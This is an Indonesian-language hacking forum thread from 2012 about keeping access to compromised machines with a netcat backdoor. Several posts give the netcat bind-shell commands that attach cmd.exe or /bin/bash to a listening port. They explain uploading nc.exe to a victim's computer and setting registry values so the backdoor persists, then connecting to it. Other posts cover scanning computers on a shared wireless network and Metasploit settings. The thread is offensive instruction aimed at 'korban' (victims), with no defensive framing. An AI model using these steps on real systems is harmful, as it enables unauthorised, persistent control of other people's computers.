Mempertahankan akses dengan NETCAT BACKDOORING
#31
waduh maaf om .. ok ok gak akan saya ulangi lagi om *ngacir*
i am back | ketika merasa kurang pintar, disaat itulah anda pintar.

#32
emm malam para sesepu backtrack semua pengguna baru mau nanya itu kita harus konek via lan dl ya maksud nya dalam 1 jaringan lan kalo mengunakan wifi bisa ga om misal nya ada 4 komputer yang terkoneksi melalui 1 wireles ruter kalo kita scaning kan pada muncul semua tu alamat ip si penguna
mohon maaf ya mas kalo ada kata2 yang salah saya baru belajar maka backtrack masi 4 hari hehe

#33
(01-25-2012, 10:57 PM)goddard.f13 Wrote: emm malam para sesepu backtrack semua pengguna baru mau nanya itu kita harus konek via lan dl ya maksud nya dalam 1 jaringan lan kalo mengunakan wifi bisa ga om misal nya ada 4 komputer yang terkoneksi melalui 1 wireles ruter kalo kita scaning kan pada muncul semua tu alamat ip si penguna
mohon maaf ya mas kalo ada kata2 yang salah saya baru belajar maka backtrack masi 4 hari hehe

walaupun ane agak ga mudeng dengan pertanyaannya tapi coba bantu jawab ya, klo ada 4 komputer yang terhubung dengan 1 wireless router tentu saja kita bisa scanning semua komputer di dalamnya

bisa dengan cara konek dulu terhadap wirelessnya (setelah itu pake nmap, autoscan dll)
atau bisa juga walaupun kita tidak terkoneksi dengan menggunakan airodump atau kismet

selamat mencoba ya, jangan lupa post hasilnya Smile

#34
aku ko ga jadi ya om
aku bingung di perintah

Code:
nc -L -p [port] -d -e cmd.exe >> untuk server window$
nc -L -p [port] -d -e /bin/bash >> untuk server linux

itu penempatannya di mana ya, ko aku ga bisa
padahal kalo upload nc dan set value registry udah berhasil

ini ss-nya om
Spoiler! :
[Image: 106yayo.jpg]

di meterpreter juga ga berhasil
mohon bantuannya om???
Cool
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#35
(01-26-2012, 01:40 PM)kuch1k1 Wrote: aku ko ga jadi ya om
aku bingung di perintah

Code:
nc -L -p [port] -d -e cmd.exe >> untuk server window$
nc -L -p [port] -d -e /bin/bash >> untuk server linux

itu penempatannya di mana ya, ko aku ga bisa
padahal kalo upload nc dan set value registry udah berhasil

ini ss-nya om
Spoiler! :
[Image: 106yayo.jpg]

di meterpreter juga ga berhasil
mohon bantuannya om???
Cool

wew, ini pasti ga menyimak kata2 TS nih

sebelumnya nc.exe diupload dulu ke komputer korban, kemudian dijalankan dengan cara....

untuk OS windows:
Code:
nc -L -p [port] -d -e cmd.exe

untuk OS Linux
Code:
nc -L -p [port] -d -e /bin/bash >> untuk server linux

trus yg -p [port] itu ga pake tanda kurung langsung aja, misal port 3000 maka -p 3000

contohnya setelah nc.exe diupload ke OS windows target, setelah itu kita konek BT5 ke OS target dengan:
Code:
nc -v [ip target] [port yg disetting sebelumnya]
ingat tanpa tanda kurung

perhatikan setiap kata dan maksud dari TS, klo memang ada kesalahan mohon dikoreksi

thx

#36
Makasih bget Om Konspirasi atas penjelasanya
aku jadi maksud
Mungkin tadi aku salah ngertiin kata"nya TS

Oke langsung TKP mau coba lg
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s

#37
malam semua saya mau nanya nih
yang di maksud LHOST itu apa ya itu di isi ip kita apa ip target nya
sama ketika saya mulai exploit nya ada pesan muncul "nossesion found" unutk medapatkan session nya apa yang harus saya lakukan mohon saran nya ya brother semua

#38
LHOST = Local Host alias pelaku
RHOST = Remote Host alias korban

#39
ijin nyimak kk, terima kasih
Semua orang adalah guru
Semua tempat adalah sekolah






Users browsing this thread: 1 Guest(s)